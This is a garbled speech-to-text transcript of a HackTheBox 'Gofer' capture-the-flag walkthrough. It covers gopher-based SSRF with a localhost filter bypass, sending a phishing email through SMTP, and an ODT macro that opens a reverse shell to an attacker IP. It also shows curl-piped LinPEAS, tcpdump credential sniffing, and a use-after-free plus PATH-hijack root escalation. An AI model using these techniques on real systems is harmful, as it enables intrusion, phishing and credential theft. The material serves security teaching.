HackTheBox - Gofer
Key Takeaways
The video demonstrates a cybersecurity attack on the Gofer HackTheBox machine, utilizing tools such as nmap, gobuster, and Burp Suite to discover vulnerabilities and gain root access. The attack involves exploiting a buffer overflow vulnerability, using SSRF to send mail, and creating a malicious note to execute a shell.
Full Transcript
what's going on YouTube this is ipag I'm doing gerer from hack the box which has three main components the first one is a server side request forgery and when playing with it you discover that you can use the goo protocol which just lets you right to Raw sockets so you can use that ssrf to talk to an SMTP port and send mail to users you send a malicious open Office document to a user with a macro they run it you get a shell on the box and then with that shell you discover that TCP dump has a capability that allows any user to um sniff packets so you can set that up on Port 80 and discover a user um sending their password to the web server when you log in as that user on the box you can discover they can run a notes binary that has a use after free vulnerability which sounds really scary but it's a super beginner way they implemented it so it should be easy to understand exactly what's going on with that being said let's just jump in as always we're going to start off with an end map so- SCC for default scripts SV numer versions OA output all formats put in the end map directory and call it gopher then the IP address of 1010 11225 this can take some time to run so I've already ran it looking at the results we have five ports open it looks like the first one being SSH on Port 22 and its Banner tells us it's a Debian server we also have well a filtered Port 25 on SMTP so there's probably a firewall or something blocking F uh SMTP so looks like only one two three four ports open not five but we do have HTTP on Port 80 that's running Apache we also have 139 and 445 open which is running samb smbd we know it's not Windows just because it says samb here so it's running the Linux client I'm going to start off with just looking at the website so 10101 11225 and it directs us to go for. htb so let's add that to our host file we can do um 1010 11225 and then gerer htb I think it had an F instead of a pH it did refresh and now we get the page so this looks like a just static page I don't see anything where we can um send data we have a few usernames like Jeff Davis or people not usernames uh this is Joselyn Hudson Tom buck and Amanda Blake and then we have a contact form so I'm just going to test this out we'll do IPC root ic. Ro test password and let's go and intercept this request send it to burp Suite uh proxy intercept is on send message and it looks like this form just doesn't work it says form action property not set so I'm not even going to bother looking at that anymore what we want to do is identify like what this site's built with is it just a static site we see this is a bootstrap thing the web page also said they were bootstrap developers to make websites so this looks very much static the site icon is also a bootstrap one uh we could try like index.php we get not found we could do like index.html and we get something here uh we could try just the defaults like SL admin see if there's an admin portal or whatnot don't have anything so I'm going to go look at SMB but before I do let's set up a gobster I'm going to look for subdomains so we'll do gobster vhost DL um HTTP go for. htb word list op secist Discovery DNS subdomains top million sure we'll call This subdomains And the reason why I'm doing um subdomains instead of just go busting directories and files generally when I get a static site on htb I go for sub uh subdomains first I normally don't do both at the same time because that can create some latency uh we have a error somewhere unable to connect our L what is that oh it's probably just dasu there we go and we have a lot of redirects so let's see we can do H let's see I'm going to run this again cancel real quick I was hoping we would have response codes let's see that's Global this is special method how do I just say ignore 302s I don't see that so what I'm going to do is just do- o for out file I'll call this go buster. vurst and that should be fine there we go and then I can just C the file and GP through later um let's see we said we're going to look at SMB so I'm going to do SMB client - capital l 10 10 11225 if I can type and we can see there is a shares directory we could have also ran like crack map exec probably if we wanted to uh what is it CME SMB 1010 11225 see is that the correct syntax it is and then is it D- shares uh let's see-u let's do like a null Authentication odly enough it's Banner says Windows 6.1 build zero but you can see uh crack map exec can do it as well I'm going to use SMB client again and then let's access the shares so 1010 11225 SL shares just hit enter for the password and it looks like there is a directory. backup and then we have mail so I'm going to get mail to download it and if I cat mail we can see some email we have J Davis atg for.tb so it's leaking the username schema um T Buckley so it's first initial last name and it says Oro Joselin received another fishing attempt yada yada Y and then at the end of it it's talking about um last thing for Tom we should do something about our web proxy um and restricting access and OD enough he's saying like you should restrict access using the limit if we go like in apache's config so Apache limit directive I think would pull it and I'm saying Apache because I'm pretty sure end map said it was Apache uh cat and map go for end map let's see Apache so if we look at the limit directive we can see it's limit and then you put HTTP methods so this is how you can require a valid user for these I say it's an odd way to do it because generally speaking you would just do a directory so you just say like um or the whole vhost there's a lot of other ways you can do it where you don't have to specify HTTP methods so let's leave this knowledge in a back pocket because we don't know where the web proxy is but we should fuzz for methods when we do find it right and that vurst is still going let's see fat gobster Dov host okay so let's do a grap DV 301 and I'll end the parentheses so like that and we do find 1401 and that is proxy.pac so let's add this to our host file so sudo viy host and we'll add proxy goer htb if we go to proxy doer. htb I did htps let's do HTTP we get a username thing so I'm going to try like admin admin can't really guess it so let's now send this over to burp Suite intercept is on send the request to repeater and when we get it we get a 401 unauthorized remember they said they were going to restrict access via limit and limit requires you to specify HTTP methods we can try post we don't get anything let's try just a file um let's do index on authorized we can do post and we get a four or4 not found so if we specif a file and also the um post or probably any method if we don't do a get method it then returns a 404 page so let us go back to go Buster and we can stop this subdomain brute forcing and we can do go Buster directory and then- capital M for method I think let's do DH real quick so I make sure now it is lowercase M for method we can say post and then you httpproxy doer. htb word list op secist Discovery web content ra small words. text and I'm going to add the extension PHP the only reason is I need to Brute Force file names and almost any other web server like python Ruby whatever they're not going to have extensions they're going to do better handling of it PHP is kind of one of The Oddities I guess we could do um Pearl if it's a CGI bin or maybe like HTML but if it's HTML it's going to be static and can't be used for a proxy so that's my logic why I only specify PHP here and we do see there is a index.php so let's do a post on index.php and we get missing URL parameter so let me do get let's just convert request because if I convert request it as this content type for me then we can say URL is equal to test and it still says it's missing the URL parameter so what I'm going to do is uh make this we can probably leave the content type there that's probably not needed but just because we're doing a post request doesn't mean we can't put parameters in the git portion so I do URL test it is now hanging so let's do http 10 10 148 I probably should cancel that request and we can say NC lvmp 901 let's listen try to connect there we send a post and we can see it connects so it's connected from 1010 11225 so we know we can make this um server maker request to us now that doesn't really help us any right because we have like a server side request for but um I don't know of any way to really exploit that so the very first thing I'm going to do is try to get a file off the server right so if I do file I don't know why I just typed FTP um ET passwd and we get blacklisted keyword file uh we could try uh maybe a PHP filter so PHP colon sl/ uh filter convert. base64 incode resource is equal to uh blacklisted keyword PHP Let's see we could just look at a bunch of um URLs so is it I think it's protocols lib curl protocols PHP and I'm doing lib Cur specifically because I just assume this is going to be using lib curl um let's see PHP lib Cur protocols so HTP https FTP gopher telet dick file ldap the Gopher One is most interesting to me and since the Box's name is gerer I mean that's a pretty big hint and I'm going to try Go for/ slash and then 10 104 8 91 send this and let's see are we listening on this I am not let's do nvmp 901 we send it and we get a connection now there's a huge difference between this connection that we got and let's change this back to http this one because lib curl will automatically add all these headers it makes it hard for us to communicate to any socket right but since um gopher doesn't put anything here we can just write in that request right so if I do uh let's put this back to gopher and then after this I can say Please Subscribe it's probably got to be percent 20 and we can see it writes now we need to put a character after the slash it can be anything we want and the only reason we're doing that is because we see it's removing the very first character so if I put a um a question mark there so it's more URL friendly we see please subscribe but it can literally be anything I believe so let's do another slash uh B Quest um let's do a wait what I guess it's because we have the percent 20 in there I don't know why it's oh I hit enter there we go I could tell because I saw this two there so I knew it was a new line I don't know when I did that so we can try the two slashes percent 20 and see it also says please subscribe so since we can write just to a socket that means we can probably connect to other plain text protocol things on this box right and I say plain text protocol because if it's going to be SSL we can't really Forge the handshake that it uses so we're limited to just whatever's communicating over plain text I know Port 22 isn't plain text but like the um Banner if I do nc1 10 11225 22 um this does get sent unencrypted right and then we do a handshake so let's test this out let's do 1010 11225 and we have this so let's try Port 25 was it was 25 the one that was filtered um cat and map go for 25 is filtered and it's just going to hang now there is something interesting going on uh that I only noticed after talking to people is 1271 is blacklisted also as well as Local Host um my first thought was to use the Box's IP address which works you could also get around that by encoding the IP address so like um 127 and hex is is equal to 7f so if I did Ping 0x then 7f 0 0 0 0 0 1 so this is each octat encoded in hex it pings Local Host so that's another way you could get around this filter um 7f 2 3 and Port 25 is hanging so what that means is we probably have to send it some type of data um I think if we just do 0 d0 a which is a line break and then we encode it will that get us anything maybe send oh we need an extra character there let's see do we have to do two see I guess we just have to make that whole mail request real quick um I don't know what's slowing it down there uh if we wanted to we could also go over to um FFF and fuzz for other ports so if we copy this and do a FFF and then - U we need to put the URL so HTTP uh 10 10 11225 oh no this is proxy doger and then I'm going to fuzz the port like that and then we'll do the word list I'm going to do this fancy redirect which is going to um build a um file and use that file in memory we do that and then we want to probably filter size for 462 oh this is all 401s we need to change the method and that's a capital m and fuff it's not capital x there we go status 200 so now we can filter size for 32 because that's the size of a request that doesn't have anything and eventually we will see things um I would guess yep 22 is there there's another way we could enumerate ports in Cas like it's not echoing any data back to us um if we look at the request I'm hitting the request a few times you see it's always probably over like 105 milliseconds if we do a port that doesn't have anything it's going to be like under 100 milliseconds right because there's no action going on if we do 80 um I guess it's is waiting for a response and it will eventually timeout so we need to in fuff look at timeouts probably to do this much better because Port 80 is hanging as well um let's see if we do get get percent 20 slash percent 20 htp1 one 0 d0 a which is a line break I believe you'll encode this twice at least we get bad request let's see if we do it to a bad Port okay so now that works 22 we still see something 25 that one hangs but you can see how we're kind of forging something right I think we need probably multiple line breaks here and maybe we need like a host header and some other headers but you can see we're just raying to it real quick if I do 10 10 14 8 on 8,000 we can see what we wrote right so enough just skipping around let's now um try to send an email so what I'm going to do is let's just open a new Pane and create a mail file so the first thing we have to start out is a hello command and it doesn't really matter what we put after it it's just got to be something and then we do mail from this can be an email address so I'll try my own and then we say who the recipient is and let's see it looks like um Joselin we go to the site see where was the users Hudson so probably Jay Hudson's the user so we'll do J Hudson at go for. htb then we need the subject and we'll say review document and then we can do the message and we can say please check out the document here HTP 10 10 148 8,000 I'll call it malicious ODT let's make this a link okay actually I don't think a Link's going to work because we're not in like Rich text format or something so let's just do that and then when you're done writing the body you just do a period and then we can quit okay so if I cat mail. text we have this let's copy this all going go to burp Suite see we convert selection URL all characters twice so let's double encode everything real quick let's paste it here and before I send it to the user I'm going to test it against myself real quick 10 104 8 I can leave on Port 25 let's just do pseudo and see lvmp 25 send it and we get everything we wanted the hello server mail from receipt to a recipient to so that looks good so let's just see if she opens any documents so first I'm going to um Python 3 mhcp server we'll listing on Port 8,000 so 10 10 11225 we sent it and the whole reason I was doing open Office is because it does say use ODT format here right as um Microsoft Office doesn't always interpret documents from it so we sent the request we don't have a response I'm expecting a response let's do z d0 a it's now just hanging we did in HEX let's see 0x7f okay so we need do the IP and hex we can't just do 10 101 0 D 0 a let's get rid of one of those line breaks because it's got an error it says I can break rules to goodbye so we did something wrong um let's see V mail. text tet uh SMTP message what did we mess up so hello maale from I wonder if we have to put brackets oh do I have data I don't so receipt two data subject this is a test message okay is that how it goes let's copy this and we can double encode it see convert selection URL all control U there we go okay so that looks better so we make the request and it says cued and goodbye now if I did 101 11225 it still just hangs so it only works if we did Local Host so when I talked about the whole evading thing you do have to do it um you can encode the IP that way there's probably a few other ways we could do it but I think hex is the easiest so now that we've sent that we should just wait and I'm going to just wait 2 minutes and oh I don't even have to so we see the server making a get request to us so let's now create a um Liberty Office document so let's do file new text document and then tools macros edit I'm going to click on my document here to create a macro on this document uh is this new that's not what I wanted uh let's see am I in I'm worried I'm in this we need to make sure we're in this macro let's do shell save I'm definitely in that let's see file new select macro new there we go now we have macro on the document and since that font's small and it's not making it bigger I'm going to type it here we're just going to do shell and then B- C b-i Dev TCP 10 104 8 9,1 zero and one like that see there we we go so this should be a good macro you can copy it paste it here and then save it and let's save to IPC htb then the box is gopher and we called it malicious. ODT save and there's one more step we have to do so let's go to tools macros organize basic and then go find a macro make sure it's under a document click assign go to the events and then Open document and then assign that macro and then you want to make sure it's saved in malicious. ODT if you save it in Liberty office it saves in like your template document which only executes on your machine we want to make sure saved on the actual document if I click run see it says connection refused so let's try that again real quick uh let's go tools macros malicious run and we can see we do get a shell so we can exit this we can save before exiting and hopefully if we send it to the user we will get a shell back uh let's make their dubdub dub go in there [Music] move the malicious here hcp server okay send the request and we have to change to the IP of 0x 7f 1 2 3 there we go so that is now cued and we just wait for the user to open it it can probably take up to 2 minutes so I'm going to just set a timer here sleep uh 120 and then we will resume the video up as I started saying it again we see they grab the document and we got a shell so let's now python 3-c import PTY PTY spawn bin bash stty raw minus Echo foreground export term is equal to X term so we can clear the screen so now we have a shell as J Hudson oddly enough we are located in user bin I expect it to be in the users's home directory let's just look at ety pass WD and GP for J Hudson and we can see the home directory is indeed home J Hudson uh we can just look at every user that has a shell whoops I did that the wrong way sh dollar and we can see there's a few other users route Jay Hudson J Davis T Buckley and a Blake if I go in my home directory we can see a users. text and then downloads and downloads looks like it's ch moded to 777 uh but there's nothing nothing in it so the very first thing I generally check is if I canudo and not found um it looks like our path is set oddly we only have user bin and Bin there's a lot of other directories so like if I Echo path on my machine we can see I have my home. local bin uh sandbox probably wouldn't be on that box use a local bin there's like user s bin there's a bunch of other bin directories right so let's just get a proper shell so I'm going to make dur SSH and we'll SSH into the box just to see if that fixes up my path so let's do s key gen- FJ Hudson cat ID uh J hudson. Pub and I probably should just name this gopher and use the same SSH key for every user but I generally name my SSH Keys the user because I'll forget what it goes to right so so let's do V authorized Keys uh type that correctly paste chod 600 sh- i j Hudson J Hudson at 1010 11225 accept the key Echo path and our path is set a little better um I wonder if I could have just done like bash Echo paath yeah I didn't think that would work because um a reverse shell executed bash there's probably a way to reset the environment variables that I'm just forgetting about but now we have a proper session it's still not found um find SL Dame pseudo pipe errors to Dev null userin so pseudo just isn't here I guess um maybe I did the dash name wrong let's hide errors grap pseudo yeah I don't see a pseudo and Bash which is definitely odd we have the bash completions but it looks like pseudo was just removed from this box I bet if we cat Etsy nope there is no Etsy stors so okay um not sure exactly what's going on but let's just run Lin pees right U it's odd that admins remove pseudo but not completely out of the ordinary so opt peas Lin peas let's start up our web server again and then I'm going to go in Dev shm because I'm going to actually log the output of lmpas this time so we'll do p Python 3 curl 101048 8000 lpsh pipe it over to bash and then we'll do a t lines. out and T will just allow it to write to the screen while also writing um to a file right and you'll see why I want to write to a file later because it just makes searching this a little bit easier not that much easier because we could just use like our teok session and search around but I like using grap right so I'm going to pause the video let Lin peas finish and then we will resume and now that Lin peas is done we can go over it so I'm just going to search my history for curlers because that gets us to the top of Lin's output and then let's see we have basic information operating system we can see it is a Debian Bullseye box and then the path so if anything in this Lin piece doesn't work as expected um check the path because you probably forgot to update it and I'm going to just copy this so so I can search it and I can easily jump down to everything I want to look at right so I normally skip Linux exploit suggestor um we have container let's look at processes just see if anything sticks out um dubdub dub data has a lot we could see me running Lin pees right here smbd that's running postfix that's running um there's my reverse shell so nothing too interesting there uh files open by process belong to other users credentials in memory cron jobs this is always good to look at everything looks standard I don't know if there's a um sber cron by default I normally don't see sber on Linux boxes so let's just look at that I think it was in cron daily we cat Samba uh this looks good and it's also cron daily so that wouldn't be really a vector here because you have to wait 24 hours and that would be just infuriating uh system timers very much like crons nothing looks out of the ordinary there socket files Unix sockets enumerating that would just take really long so again that's like Linux exploit suggest to come back to it when we don't really have anything we have Etsy host there active ports we can see um SMTP is only listening on 25 so this is why when we tried to use burp suite and use the rable IP of 1010 11225 we didn't get anywhere I'm kind of surprised that it didn't like just um close the socket right away like the burp Suite window hung I'm not sure exactly why that's probably because of the IP tables Rule now they think of it because IP table or end map when we first ran this box said Port 25 was filtered which means it was probably a drop not a reject by default Linux will just reject if it's not listening so since Port 25 was probably set to drop on all interfaces when my burp Suite hit 10 10 11225 um and it didn't do anything that's because IP tables dropped the packet so it never sent me the reject so my web browser just hung waiting for the um acknowledgement to come back that's probably exactly what happened uh pseudo doesn't exist on the box I'll use users login now last login doesn't look anything interesting useful software on the box compilers uh let's see we had the Apache config and right here it is using the directory I don't think they need the limit G at all I think the off type off name and stuff was valid under directory and it would put the password which is in the HT passwd file as that's the very next thing analyzing it we see T Buckley um I'm not going to waste time and try to crack this I normally would but I know this is not a crackable hash you just use hash cap I have 100 videos on that so let's just skip over that we have Pam moth files everything looks standard there let's see what is the next thing I want SMB files we could just look at it it's just enabling guest and everything that's running a command is commented out interesting permissions so this is always a good one and we have user local bin notes so let's look at that um if we try to execute it we have permission denied because only members of Dev can execute it we have the root user and then the dev permissions I'm guessing that's um let's see I don't know why it says s it's probably just a special permission bit that's set um but it is probably set uid um so if we're a member of the dev group we would be able to access that so let's cat Etsy group grep for Dev and we can see T Buckley is a member of that so let's go to shm grip Lin's output for T Buckley and see if we can easily get to them uh let's see this hash so again normally would try cracking that but it is a dead end and there's nothing else we can do with that so let's just keep going down this list to see if there's anything else special misconfigurations on ld.so uh we do have have TCP dump has cap net admin and what that allows us to do is any user that can execute TCP dump can now um dump packets because of this capability so let us try this out so if I do TCP dump I can probably do- I any so what do we want to dump if I do like Port 22 uh my dump file is going to get huge right so I'm going to say let's do Port 80 I guess we'll do- Port 80 and if this doesn't get anything then I do like 445 and 25 um we could probably also do like Port not 22 but let's do that and I do want to say Das right output file we'll say um 80. cap and I'm also going to do is it- s0 to capture the entire packet I I think so so let that go while we get to the end of this scripts nothing interesting Herm directories we've already looked at interesting files I don't know what those are and it doesn't look like we really have anything else so let's see do we have anything on that uh there is stuff if I do strings against it we can see HTTP page we haven't got the page so this is definitely someone hitting it let's see strings grap proxy so someone is hitting that we can do Dash A5 for after five and we get the authorization header I'm going to download this capture in just a minute so we can see it in wire shark but this is a quick way to do it and we can get T Buckley's password we can try switching over to it so s-t Buckley put in the password and we get logged in so this now lets us access that user bin a user local bin notes directory but I want to download this capture so we can just open up in wire shark so let's do let's see scp-j Hudson Pub oh no J Hudson is right and then J Hudson at 1010 11225 Dev shm 80. cap and we can wire sharket to see exactly what's going on and my wire shark font is super small um is that just like edit preferences layout font and colors uh let's do this that should be fine okay I wish this was in dark mode is there a quick way to do it appearance no layout I know there is but oh well so I do not like how big this font is it's going to mess me up let's change that to 25 there we go that looks better so I'm going to filter for HTTP and we can see there's a few streams uh this is kind of getting truncated off but if we follow HTTP stream we can easily see it so we have a get request loading gerer htb and then the header here and if we look at all the streams I think they're all the same right this is a get slash after that this is probably the proxy hitting it so we make a request to the proxy and then the proxy hits it so that's all this is if we look at this stream it's probably not going to have that header because this is the proxy code reaching out to it so let's follow yep so okay now that we have that let's get on the T Buckley user and we'll save this password so vs. text paste it in s-t Buckley copy paste and then the first thing I do is a pseudo- well pseudos doesn't exist um so we can do um execute user local bin notes now and we get a menu and if you do a lot of ctfs with just use after free or Heap challenges this menu probably looks familiar it's just reused in a lot of beginners where we can create two pieces of information we can create a user and a note we can show our user information delete our user um we can also show note and delete a note right so if I do one IPC we can show the user information my username is IPC the role is user let's write a note please subscribe we can show a note we see the note is subscribe odly enough please is not there I wonder if let's see five show a note please okay okay so it's doing something weird with spaces um okay uh doesn't really matter but we can see we have notes and users still now what I'm going to do is uh we can create a user we can do IC I'm going to then delete my user then I'm going to create a note and then put a bunch of A's in there that looks fine now we're going to show the user information and we see we over filed and went username and roll and overfilled is probably a wrong word because it makes you think we went to like a buffer overflow and there's nothing happening on the stack here and if you're confused I am going to copy the binary down we'll open up in gedra and examine it right but I just wanted to show kind of how I did it we can look at a note it is a as well so what I'm going to do is we'll exit we're going to run it again I'm going to create a user doesn't matter what it is we're going to delete and then we're going to to write a note and guess the number of A's um it's probably going to be an increment of eight so let's try um 16 and then the role of please sub like that so now I'm going to show user information and we see my username and then the RO now is set to Please Subscribe I think I didn't show the backup notes function and we just have access n we don't have admin but if we had set a ro to admin then the backup note function would think we're an admin right so now that like we've done a lot of magic let's explain exactly what's going on in the binary uh let's just go to Dev shm CP user local uh Bin notes Here Python 3 HTTP server and then we can W get 10 10 11225 800 000 note notes there we go it is notes so I'm going to open up G and then we will examine this binary and then we'll step through it in GDB to really show what is going on let's import import there we go notes sure analyze yep okay so exports Main and here's all the de compiled code so we have the menu here we have um case one and then it's going to um malic 40 bytes or mic some memory over to local 10 always hate being too specific right but local 10 if we look G is really annoying at this I don't like how it just says local uncore 10 and then if I highlight over this actually isn't uh this the stack minus 10 is also um misleading I don't know when we go through in GDB why don't like this local T will make more sense right but this is going to be the pointer to where the username is stored so whatever address this gives us that's where the username is stored um and if we go to this one case four this is where creating the note the pointer to where it stored is here just assigning memory right so if we look at the user we only see it using a free on local 10 and what that does is erase the data or free up the memory where that memory was right it doesn't actually unset the pointer we would need to do like local 10 equals null to unset the pointer here and because the pointer is not unset so what's happening is um we say we want memory we want 20 let's just say this 28 bytes we want 28 bytes of memory it's going to go okay it's going to look at the Heap and say the first available uh chunks are at this address and then when we delete the memory we delete those chunks so when we do Malik for the second time with the notes it's going to give us the same address it gave us for the username and we just put data there and whatever we're putting there is what now is pointed to also the username if that doesn't make sense we'll step through in GDB in just a second and we can see uh let's see where is that start adding the role so so we assign this much memory then we do mem set and let's see let's just step through a memory that would be a bit easier so I'm going to sod plus X notes GDB on notes and now I'm going to break main we can run and we want to set two break points we want to set a break point on 27d cuz that's going to be where we move uh the pointer into memory and Rax gets moved to RBP + 10 or that's um local 10 so let's set a break point what do I say 27d yep and then we want to set a break point for The Other M right so here we'll do breakpoint right after Malik 39e so breakpoint 39e so we'll continue let's create our username we'll do IPC actually before we do a put a username let's look at what Rax is so I'll do IR for info register Rax and this is the pointer so when we type IPC this pointer is going to be the pointer to where IPC is stored in memory so let's just do this user so we're going to take a note there so I'll continue we'll type ipac and let's create a note uh write a note and we could x/s on that pointer real quick and we see that is indeed IC right right so the next memory is going to be an RBP minus 10 if we look at here before it was RBP minus 0x8 so RX is where the pointer is but when we leave it we put it onto RBP for like long term storage right so let's now do an R RX and we see that pointer is af0 so this will be note and this is behaving as we expect right if we do please subscribe that looks good we can show user and show a note right so I'm going to rerun the application and we're going to do it again but in the slightly different order of creating user deleting the pointer freeing the memory and then creating the note right so do IR RX it is still set to ac0 because um we executed the program with GDB which would disable aslr so that's why all the memory is the same so let us put IPC here and then we're going to delete the note or delete the user we're going to write the note we're going to do an IR on Rax and now we see it is ac0 again so the first user was that and now note is also this and if we do XS on that address it's blank right now I hope because we freed the memory yes it is blank remember we did that the last time we ran the program and that said IPC when we were right here now now it is blank because again we freed up the memory but because we didn't unset the pointer it still pointed to this spot in memory so now when I continue and we put 1 two 3 4 1 2 3 4 we'll put um 24 A's I think I said 16 before but it's 24 um we'll say admin now when we show user information it says we are admin and now if I went to backup notes we could see it did a few things and we see it running T so the last step of the puzzle is to see what that admin function is and we see it's running T but it's not using the full path and since this is a set uid binary not pseudo we can change a path variable and put tar like in the current working directory and do a path hijack so let's do that so let's do Echo path we have the path here let's do export whoops export path is equal to PWD which is a current working directory so now when I look at path it's D shm if I execute tar right now it's going to use the tar out of user bin right but now if I create a new tar and this is just going to run bash because my path has D shm up to the top when I run which T it's going to execute that which is just a bash shell um that's odd which T definitely did show it but when I ran T it did not that ran that's weird but I think when I run the program it'll drop me into a shell so let's test this out um let's call notes we'll create a user IPC then we want to delete IPC we write a note um we need 24 a okay and then we just say admin so now when I show user information a role is admin I click backup notes and it executed as T Buckley I guess because there's no set uid call so we probably have to make a c program to do this do we have GCC on this box we do so let us remove tar and we will create um shell. C I guess and then let's just do um in main void uh set uid zero and system bin bash oh I probably need the Das P that's by why it didn't work before um GCC shell that looks like it works move a. out to car see 1 2 3 4 1 2 3 4 that's all the A's I need let's try this again we'll execute notes we will create a user delete one two 3 admin I should just copy this on my clipboard now backup notes we are still just T Buckley I think we are missing one step let's see I bet it's a weird permission on M Dev shm and since it's my working directory let's see yeah devis hm has no sew so I wonder if that is what's doing it um let's go to town let's make sure temp doesn't have no sew it right let's see I don't see amount on sltm so that would just be going back to slash and that will be have SE okay so let's do tar fin bash we'll call it bash DP and if it doesn't work with bash I'll copy my small C program I just put here right um Echo let's copy all those A's Echo path export path is equal to this we'll remove Dev shm and put temp so now when we run which T we get tempar okay so I'm going to run notes again and I'm going to copy all these so I set my thing to admin create a user delete a user write a note we can show that looks good hit eight and there we go we are root so it's because I was in Dev shm um weird problem but we can go to root and get root. text so hopefully that all made sense um again when we freed this if you don't understand what happened where is The Free We copy this this is only deleting the data where local 10 existed so you would need to do like local 10 is equal to null as well to unset that pointer because again um it's pointed to that spot in memory and whenever we run Malo is going to give us the first available and since we freed it it's saying wherever the user was pointed to is now free so you are free to use that spot in memory for your note and when we do we now have the user pointed to the same spot we were able to write which is our note um I bet if we look at this I can make more sense of how we know um the role so 18 is going to be 24 so this mem set is going to be setting the username and that's going to use the rest of the space we allocated hex 28 um so it's going to use hex 10 more for the rooll assignment right that's just a struct the user pretty much a structure in memory and it says there is um 24 bytes for the user and uh 10 bytes for the um or 16 bytes probably for the roll so hopefully that all makes sense um so that is going to be the Box hope you guys enjoyed it take care and I will see you all next week
Original Description
00:00 - Introduction
01:00 - Start of nmap
03:40 - Running gobuster to discover the proxy.gofer.htb subdomain
05:20 - Enumerating SMB to find a note which gives an email address to send a malicious document to and hints at HTTP Methods being filtered
08:45 - Discovering the proxy.gofer.htb domain responds differently to POST vs GET requests, then gobustering setting our method to POST
11:55 - Finding a SSRF in the proxy, then playing with protocols to discover it accepts GOPHER requests
16:40 - Showing we can get around the localhost/127.0.0.1 blacklist by encoding the IP Address in HEX, then showing why gopher requests are cool
21:30 - Sending a SMTP Request via gopher to send an email with a link to a malicious file
27:55 - Making a ODT Document with a macro that executes on-open and sends a shell
34:50 - shell as jhudson
36:30 - Going over LinPEAS, discovering TCPDump has capabilities to allow any user to capture packets
44:40 - Opening the capture in Wireshark and showing the TBuckley sent his password to the proxy, then SSH as him
46:57 - Executing the notes binary, looks like a traditional UAF Problem, playing with it blindly
50:30 - Opening the binary in Ghidra to show deleting the username only calls free, does not unset the pointer
53:19 - Running the binary in GDB, then setting breakpoints and showing USER and NOTES have different pointers when setting them one after another.
56:00 - Showing what happens when you create the user, free the memory, then create the note (Both USER and NOTE now point to the same point in memory
59:38 - Having an issue when doing it, turns out to be because we placed our shell in /dev/shm which is mounted NOSUID
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related Reads
Chapters (17)
Introduction
1:00
Start of nmap
3:40
Running gobuster to discover the proxy.gofer.htb subdomain
5:20
Enumerating SMB to find a note which gives an email address to send a maliciou
8:45
Discovering the proxy.gofer.htb domain responds differently to POST vs GET req
11:55
Finding a SSRF in the proxy, then playing with protocols to discover it accept
16:40
Showing we can get around the localhost/127.0.0.1 blacklist by encoding the IP
21:30
Sending a SMTP Request via gopher to send an email with a link to a malicious
27:55
Making a ODT Document with a macro that executes on-open and sends a shell
34:50
shell as jhudson
36:30
Going over LinPEAS, discovering TCPDump has capabilities to allow any user to
44:40
Opening the capture in Wireshark and showing the TBuckley sent his password to
46:57
Executing the notes binary, looks like a traditional UAF Problem, playing with
50:30
Opening the binary in Ghidra to show deleting the username only calls free, do
53:19
Running the binary in GDB, then setting breakpoints and showing USER and NOTES
56:00
Showing what happens when you create the user, free the memory, then create th
59:38
Having an issue when doing it, turns out to be because we placed our shell in
🎓
Tutor Explanation
DeepCamp AI